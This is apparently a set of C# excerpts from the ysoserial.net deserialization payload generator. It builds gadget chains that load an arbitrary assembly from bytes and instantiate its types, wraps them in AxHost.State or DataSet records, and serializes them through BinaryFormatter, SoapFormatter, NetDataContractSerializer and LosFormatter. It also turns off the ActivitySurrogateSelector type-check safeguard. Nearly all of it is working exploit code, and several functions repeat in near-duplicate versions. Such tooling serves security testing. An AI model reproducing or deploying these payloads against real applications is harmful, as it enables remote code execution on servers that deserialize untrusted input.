/// <summary>
/// ISerializable hook. Serializes the object list returned by GadgetChains()
/// into a BinaryFormatter stream (under MySurrogateSelector) and stores those
/// bytes as the "PropertyBagBinary" member of a System.Windows.Forms.AxHost.State
/// record, so the outer payload deserializes as an AxHost.State.
/// </summary>
/// <param name="info">Serialization store; retyped to AxHost.State and given the PropertyBagBinary value.</param>
/// <param name="context">Not used.</param>
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
    System.Diagnostics.Trace.WriteLine("In GetObjectData");
    // GadgetChains() and inputArgs are members of this class defined outside this view.
    List<object> ls = GadgetChains();

    // Wrap the object inside a DataSet. This is so we can use the custom
    // surrogate selector. Idiocy added and removed here.
    // (Kept as a comment toggle: the DataSet wrapper below is the alternative to AxHost.State.)
    /*
     * info.SetType(typeof(System.Data.DataSet));
     * info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
     * info.AddValue("DataSet.DataSetName", "");
     * info.AddValue("DataSet.Namespace", "");
     * info.AddValue("DataSet.Prefix", "");
     * info.AddValue("DataSet.CaseSensitive", false);
     * info.AddValue("DataSet.LocaleLCID", 0x409);
     * info.AddValue("DataSet.EnforceConstraints", false);
     * info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null);
     * info.AddValue("DataSet.Tables.Count", 1);
     * BinaryFormatter fmt = new BinaryFormatter();
     * MemoryStream stm = new MemoryStream();
     * fmt.SurrogateSelector = new MySurrogateSelector();
     * fmt.Serialize(stm, ls);
     * info.AddValue("DataSet.Tables_0", stm.ToArray());
     //*/

    //* saving around 404 characters by using AxHost.State instead of DataSet
    // However, DataSet can apply to more applications
    // https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state
    // vs
    // https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset
    MemoryStream stm = new MemoryStream();
    if (inputArgs.Minify)
    {
        // Minify mode: the project's modified BinaryFormatter, same surrogate selector.
        ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
        fmtLocal.SurrogateSelector = new MySurrogateSelector();
        fmtLocal.Serialize(stm, ls);
    }
    else
    {
        BinaryFormatter fmt = new BinaryFormatter();
        fmt.SurrogateSelector = new MySurrogateSelector();
        fmt.Serialize(stm, ls);
    }
    // The outer record is an AxHost.State; its PropertyBagBinary carries the inner
    // BinaryFormatter stream. The stream is not disposed (MemoryStream, no unmanaged state).
    info.SetType(typeof(System.Windows.Forms.AxHost.State));
    info.AddValue("PropertyBagBinary", stm.ToArray());
    //*/
}
/// <summary>
/// Serializes <paramref name="fakeTable"/> with a BinaryFormatter — the project's
/// modified one when <c>inputArgs.Minify</c> is set, the stock one otherwise — and
/// hands the resulting bytes to SetFakeTable (defined elsewhere in this class).
/// </summary>
/// <param name="fakeTable">Object graph stored as the fake table bytes.</param>
/// <param name="inputArgs">Generator options; only Minify is read here.</param>
public DataSetMarshal(object fakeTable, InputArgs inputArgs)
{
    MemoryStream buffer = new MemoryStream();
    if (!inputArgs.Minify)
    {
        new BinaryFormatter().Serialize(buffer, fakeTable);
    }
    else
    {
        ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter minified =
            new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
        minified.Serialize(buffer, fakeTable);
    }
    SetFakeTable(buffer.ToArray());
}
/// <summary>
/// Serializes <paramref name="fakePropertyBagBinary"/> with a BinaryFormatter — the
/// project's modified one when <c>inputArgs.Minify</c> is set, the stock one otherwise —
/// and hands the resulting bytes to SetFakePropertyBagBinary (defined elsewhere in this class).
/// </summary>
/// <param name="fakePropertyBagBinary">Object graph stored as the property-bag bytes.</param>
/// <param name="inputArgs">Generator options; only Minify is read here.</param>
public AxHostStateMarshal(object fakePropertyBagBinary, InputArgs inputArgs)
{
    MemoryStream buffer = new MemoryStream();
    if (!inputArgs.Minify)
    {
        new BinaryFormatter().Serialize(buffer, fakePropertyBagBinary);
    }
    else
    {
        ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter minified =
            new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
        minified.Serialize(buffer, fakePropertyBagBinary);
    }
    SetFakePropertyBagBinary(buffer.ToArray());
}
/// <summary>
/// ISerializable hook. Builds the object list <c>ls</c> in one of two ways, selected by
/// the <c>variant_number</c> field (variant 2 = the older LINQ Select/SelectMany chain,
/// otherwise the WhereSelectEnumerableIterator-only chain), appends a Hashtable whose
/// buckets are rewritten by reflection so that <c>verb</c> replaces the string key,
/// serializes the list with a BinaryFormatter under MySurrogateSelector, and stores the
/// bytes as the "PropertyBagBinary" member of a System.Windows.Forms.AxHost.State record.
/// <c>variant_number</c>, <c>assemblyBytes</c>, <c>inputArgs</c> and
/// <c>CreateWhereSelectEnumerableIterator</c> are class members defined outside this view.
/// </summary>
/// <param name="info">Serialization store; retyped to AxHost.State and given the PropertyBagBinary value.</param>
/// <param name="context">Not used.</param>
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
    System.Diagnostics.Trace.WriteLine("In GetObjectData");
    // All three are assigned in both branches of the if/else below, so they are non-null
    // by the time the Hashtable is built.
    DesignerVerb verb = null;
    Hashtable ht = null;
    List<object> ls = null;

    //variant 2, old technique
    if (this.variant_number == 2)
    {
        // Build a chain to map a byte array to creating an instance of a class.
        // byte[] -> Assembly.Load -> Assembly -> Assembly.GetType -> Type[] -> Activator.CreateInstance -> Win!
        List<byte[]> data = new List<byte[]>();
        data.Add(this.assemblyBytes);
        var e1 = data.Select(Assembly.Load);
        Func<Assembly, IEnumerable<Type>> map_type = (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes"));
        var e2 = e1.SelectMany(map_type);
        var e3 = e2.Select(Activator.CreateInstance);
        // PagedDataSource maps an arbitrary IEnumerable to an ICollection
        PagedDataSource pds = new PagedDataSource() { DataSource = e3 };
        // AggregateDictionary maps an arbitrary ICollection to an IDictionary
        // Class is internal so need to use reflection.
        IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
        // DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
        verb = new DesignerVerb("", null);
        // Need to insert IDictionary using reflection.
        typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
        // Pre-load objects, this ensures they're fixed up before building the hash table.
        ls = new List<object>();
        ls.Add(e1);
        ls.Add(e2);
        ls.Add(e3);
        ls.Add(pds);
        ls.Add(verb);
        ls.Add(dict);
    }
    //Default, use compatible mode.
    //The old technique contains a compiler-generated class [System.Core]System.Linq.Enumerable+<SelectManyIterator>d__[Compiler_Generated_Class_SEQ]`2;
    //the Compiler_Generated_Class_SEQ may NOT be the same in different versions of the .NET Framework.
    //For example, in .NET Framework 4.6 it was 16, and 17 in .NET Framework 4.7.
    //The new technique uses [System.Core]System.Linq.Enumerable+WhereSelectEnumerableIterator`2 only, to fix that.
    //It is compatible from v3.5 to the latest (needs the v3.5 compiler, and may also need the disable-type-check call first if the target runtime is v4.8+).
    //Execution chain: Assembly.Load(byte[]).GetTypes().GetEnumerator().{MoveNext(),get_Current()} -> Activator.CreateInstance() -> Win!
    else
    {
        byte[][] e1 = new byte[][] { assemblyBytes };
        IEnumerable<Assembly> e2 = CreateWhereSelectEnumerableIterator<byte[], Assembly>(e1, null, Assembly.Load);
        IEnumerable<IEnumerable<Type>> e3 = CreateWhereSelectEnumerableIterator<Assembly, IEnumerable<Type>>(e2, null, (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes")));
        IEnumerable<IEnumerator<Type>> e4 = CreateWhereSelectEnumerableIterator<IEnumerable<Type>, IEnumerator<Type>>(e3, null, (Func<IEnumerable<Type>, IEnumerator<Type>>)Delegate.CreateDelegate(typeof(Func<IEnumerable<Type>, IEnumerator<Type>>), typeof(IEnumerable<Type>).GetMethod("GetEnumerator")));
        //bool MoveNext(this) => Func<IEnumerator<Type>,bool> => predicate
        //Type get_Current(this) => Func<IEnumerator<Type>,Type> => selector
        //
        //WhereSelectEnumerableIterator`2.MoveNext =>
        //  if(predicate(IEnumerator<Type>)) {selector(IEnumerator<Type>);} =>
        //  IEnumerator<Type>.MoveNext();return IEnumerator<Type>.Current;
        // Note: "MoveNext" is taken from the non-generic IEnumerator, "Current" from IEnumerator<Type>.
        IEnumerable<Type> e5 = CreateWhereSelectEnumerableIterator<IEnumerator<Type>, Type>(e4, (Func<IEnumerator<Type>, bool>)Delegate.CreateDelegate(typeof(Func<IEnumerator<Type>, bool>), typeof(IEnumerator).GetMethod("MoveNext")), (Func<IEnumerator<Type>, Type>)Delegate.CreateDelegate(typeof(Func<IEnumerator<Type>, Type>), typeof(IEnumerator<Type>).GetProperty("Current").GetGetMethod()));
        IEnumerable<object> end = CreateWhereSelectEnumerableIterator<Type, object>(e5, null, Activator.CreateInstance);
        // PagedDataSource maps an arbitrary IEnumerable to an ICollection
        PagedDataSource pds = new PagedDataSource() { DataSource = end };
        // AggregateDictionary maps an arbitrary ICollection to an IDictionary
        // Class is internal so need to use reflection.
        IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
        // DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
        verb = new DesignerVerb("", null);
        // Need to insert IDictionary using reflection.
        typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
        // Pre-load objects, this ensures they're fixed up before building the hash table.
        ls = new List<object>();
        ls.Add(e1);
        ls.Add(e2);
        ls.Add(e3);
        ls.Add(e4);
        ls.Add(e5);
        ls.Add(end);
        ls.Add(pds);
        ls.Add(verb);
        ls.Add(dict);
    }

    ht = new Hashtable();
    // Add two entries to table.
    /*
     * ht.Add(verb, "Hello");
     * ht.Add("Dummy", "Hello2");
     */
    ht.Add(verb, "");
    ht.Add("", "");
    // The rewrite below depends on Hashtable's private "buckets" array and the public
    // "key" field of its element struct. There is no null check: if a runtime lacks
    // either member, GetField returns null and the next dereference throws.
    FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
    Array keys = (Array)fi_keys.GetValue(ht);
    FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance);
    // Find the bucket holding the "" string key and swap its key for verb, so the
    // table's two live buckets both carry verb as their key. The struct is copied out
    // by GetValue, hence the explicit SetValue back into the array.
    for (int i = 0; i < keys.Length; ++i)
    {
        object bucket = keys.GetValue(i);
        object key = fi_key.GetValue(bucket);
        if (key is string)
        {
            fi_key.SetValue(bucket, verb);
            keys.SetValue(bucket, i);
            break;
        }
    }
    fi_keys.SetValue(ht, keys);
    ls.Add(ht);

    // Wrap the object inside a DataSet. This is so we can use the custom
    // surrogate selector. Idiocy added and removed here.
    // (Kept as a comment toggle: the DataSet wrapper below is the alternative to AxHost.State.)
    /*
     * info.SetType(typeof(System.Data.DataSet));
     * info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
     * info.AddValue("DataSet.DataSetName", "");
     * info.AddValue("DataSet.Namespace", "");
     * info.AddValue("DataSet.Prefix", "");
     * info.AddValue("DataSet.CaseSensitive", false);
     * info.AddValue("DataSet.LocaleLCID", 0x409);
     * info.AddValue("DataSet.EnforceConstraints", false);
     * info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null);
     * info.AddValue("DataSet.Tables.Count", 1);
     * BinaryFormatter fmt = new BinaryFormatter();
     * MemoryStream stm = new MemoryStream();
     * fmt.SurrogateSelector = new MySurrogateSelector();
     * fmt.Serialize(stm, ls);
     * info.AddValue("DataSet.Tables_0", stm.ToArray());
     //*/

    //* saving around 404 characters by using AxHost.State instead of DataSet
    // However, DataSet can apply to more applications
    // https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state
    // vs
    // https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset
    MemoryStream stm = new MemoryStream();
    if (inputArgs.Minify)
    {
        // Minify mode: the project's modified BinaryFormatter, same surrogate selector.
        ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
        fmtLocal.SurrogateSelector = new MySurrogateSelector();
        fmtLocal.Serialize(stm, ls);
    }
    else
    {
        BinaryFormatter fmt = new BinaryFormatter();
        fmt.SurrogateSelector = new MySurrogateSelector();
        fmt.Serialize(stm, ls);
    }
    // The outer record is an AxHost.State; its PropertyBagBinary carries the inner BinaryFormatter stream.
    info.SetType(typeof(System.Windows.Forms.AxHost.State));
    info.AddValue("PropertyBagBinary", stm.ToArray());
    //*/
}
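/// <summary>
/// Serializes <paramref name="payloadObj"/> with the formatter selected by name and
/// returns the serialized bytes. Recognised names, matched case-insensitively:
/// "binaryformatter", "soapformatter", "netdatacontractserializer" and "losformatter".
/// When <c>inputArgs.Test</c> is set, the produced bytes are immediately deserialized
/// again in this process by the same formatter; an exception from that round trip is
/// handed to Debugging.ShowErrors rather than propagated.
/// </summary>
/// <param name="payloadObj">Object graph to serialize.</param>
/// <param name="formatter">Formatter name; case is ignored, culture-invariantly.</param>
/// <param name="inputArgs">Generator options; Minify, UseSimpleType and Test are read here.</param>
/// <returns>The serialized payload as a <c>byte[]</c> (declared as object for interface compatibility).</returns>
/// <exception cref="ArgumentNullException"><paramref name="formatter"/> is null.</exception>
/// <exception cref="NotSupportedException"><paramref name="formatter"/> names no supported formatter.</exception>
public object Serialize(object payloadObj, string formatter, InputArgs inputArgs)
{
    if (formatter == null)
    {
        // Previously surfaced as a NullReferenceException from formatter.ToLower().
        throw new ArgumentNullException("formatter");
    }

    // Disable ActivitySurrogate type protections during generation.
    // AppSettings.Set only alters the in-memory configuration of this (generating) process.
    ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");

    MemoryStream stream = new MemoryStream();

    // ToLowerInvariant instead of the culture-sensitive ToLower: under e.g. tr-TR,
    // "BINARYFORMATTER".ToLower() does not equal "binaryformatter".
    switch (formatter.ToLowerInvariant())
    {
        case "binaryformatter":
        {
            BinaryFormatter fmt = new BinaryFormatter();
            if (inputArgs.Minify)
            {
                // Minify mode writes with the project's modified BinaryFormatter; the stock
                // instance above is still the one used for the Test round trip.
                ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
                fmtLocal.Serialize(stream, payloadObj);
            }
            else
            {
                fmt.Serialize(stream, payloadObj);
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    fmt.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        // ObjectStateFormatter is deliberately not offered: it is the same as LosFormatter
        // without MAC/keys, so the "losformatter" case covers it.

        case "soapformatter":
        {
            SoapFormatter sf = new SoapFormatter();
            sf.Serialize(stream, payloadObj);
            if (inputArgs.Minify)
            {
                // XMLMinifier returns a new stream; the original is not disposed here.
                stream.Position = 0;
                if (inputArgs.UseSimpleType)
                {
                    stream = XMLMinifier.Minify(stream, new string[] { "Microsoft.PowerShell.Editor" }, null, FormatterType.SoapFormatter, true);
                }
                else
                {
                    stream = XMLMinifier.Minify(stream, null, null, FormatterType.SoapFormatter, true);
                }
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    sf.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        case "netdatacontractserializer":
        {
            NetDataContractSerializer ndcs = new NetDataContractSerializer();
            ndcs.Serialize(stream, payloadObj);
            if (inputArgs.Minify)
            {
                stream.Position = 0;
                if (inputArgs.UseSimpleType)
                {
                    stream = XMLMinifier.Minify(stream, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, null, FormatterType.NetDataContractXML, true);
                }
                else
                {
                    stream = XMLMinifier.Minify(stream, null, null, FormatterType.NetDataContractXML, true);
                }
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    ndcs.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        case "losformatter":
        {
            LosFormatter lf = new LosFormatter();
            if (inputArgs.Minify)
            {
                // The minified LOS stream is produced by the project's helper and replaces the empty stream.
                stream = Helpers.ModifiedVulnerableBinaryFormatters.SimpleMinifiedObjectLosFormatter.Serialize(payloadObj);
            }
            else
            {
                lf.Serialize(stream, payloadObj);
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    lf.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        default:
            // NotSupportedException derives from Exception, so existing catch (Exception) handlers still apply.
            throw new NotSupportedException("Formatter not supported");
    }
}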
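/// <summary>
/// Serializes <paramref name="payloadObj"/> with the formatter selected by name and
/// returns the serialized bytes. Recognised names, matched case-insensitively:
/// "binaryformatter", "soapformatter", "netdatacontractserializer" and "losformatter".
/// When <c>inputArgs.Test</c> is set, the produced bytes are immediately deserialized
/// again in this process by the same formatter (with <c>serializationBinder</c>, a class
/// member defined outside this view, installed when non-null); an exception from that
/// round trip is handed to Debugging.ShowErrors rather than propagated.
/// </summary>
/// <param name="payloadObj">Object graph to serialize.</param>
/// <param name="formatter">Formatter name; case is ignored, culture-invariantly.</param>
/// <param name="inputArgs">Generator options; Minify, UseSimpleType and Test are read here.</param>
/// <returns>The serialized payload as a <c>byte[]</c> (declared as object for interface compatibility).</returns>
/// <exception cref="ArgumentNullException"><paramref name="formatter"/> is null.</exception>
/// <exception cref="NotSupportedException"><paramref name="formatter"/> names no supported formatter.</exception>
public object Serialize(object payloadObj, string formatter, InputArgs inputArgs)
{
    if (formatter == null)
    {
        // Previously surfaced as a NullReferenceException from formatter.ToLower().
        throw new ArgumentNullException("formatter");
    }

    MemoryStream stream = new MemoryStream();

    // ToLowerInvariant instead of the culture-sensitive ToLower: under e.g. tr-TR,
    // "BINARYFORMATTER".ToLower() does not equal "binaryformatter".
    switch (formatter.ToLowerInvariant())
    {
        case "binaryformatter":
        {
            BinaryFormatter fmt = new BinaryFormatter();
            if (inputArgs.Minify)
            {
                // Minify mode writes with the project's modified BinaryFormatter; the stock
                // instance above is still the one used for the Test round trip.
                ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
                fmtLocal.Serialize(stream, payloadObj);
            }
            else
            {
                fmt.Serialize(stream, payloadObj);
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    if (serializationBinder != null)
                    {
                        fmt.Binder = serializationBinder;
                    }
                    fmt.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        // ObjectStateFormatter is deliberately not offered: it is the same as LosFormatter
        // without MAC/keys, so the "losformatter" case covers it.

        case "soapformatter":
        {
            SoapFormatter sf = new SoapFormatter();
            sf.Serialize(stream, payloadObj);
            if (inputArgs.Minify)
            {
                // XMLMinifier returns a new stream; the original is not disposed here.
                stream.Position = 0;
                if (inputArgs.UseSimpleType)
                {
                    stream = XMLMinifier.Minify(stream, new string[] { "Microsoft.PowerShell.Editor" }, null, FormatterType.SoapFormatter, true);
                }
                else
                {
                    stream = XMLMinifier.Minify(stream, null, null, FormatterType.SoapFormatter, true);
                }
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    if (serializationBinder != null)
                    {
                        sf.Binder = serializationBinder;
                    }
                    sf.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        case "netdatacontractserializer":
        {
            NetDataContractSerializer ndcs = new NetDataContractSerializer();
            ndcs.Serialize(stream, payloadObj);
            if (inputArgs.Minify)
            {
                stream.Position = 0;
                if (inputArgs.UseSimpleType)
                {
                    // The second array is a regex list handed to the minifier; it strips Signature2 elements.
                    stream = XMLMinifier.Minify(stream, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { @"\<Signature2[^\/]+<\/Signature2\>" }, FormatterType.NetDataContractXML, true);
                }
                else
                {
                    stream = XMLMinifier.Minify(stream, null, null, FormatterType.NetDataContractXML, true);
                }
            }
            if (inputArgs.Test)
            {
                try
                {
                    stream.Position = 0;
                    if (serializationBinder != null)
                    {
                        ndcs.Binder = serializationBinder;
                    }
                    ndcs.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        case "losformatter":
        {
            LosFormatter lf = new LosFormatter();
            if (inputArgs.Minify)
            {
                // The minified LOS stream is produced by the project's helper and replaces the empty stream.
                stream = Helpers.ModifiedVulnerableBinaryFormatters.SimpleMinifiedObjectLosFormatter.Serialize(payloadObj);
            }
            else
            {
                lf.Serialize(stream, payloadObj);
            }
            if (inputArgs.Test)
            {
                // LosFormatter exposes no Binder, so serializationBinder is not applied here.
                try
                {
                    stream.Position = 0;
                    lf.Deserialize(stream);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return stream.ToArray();
        }

        default:
            // NotSupportedException derives from Exception, so existing catch (Exception) handlers still apply.
            throw new NotSupportedException("Formatter not supported");
    }
}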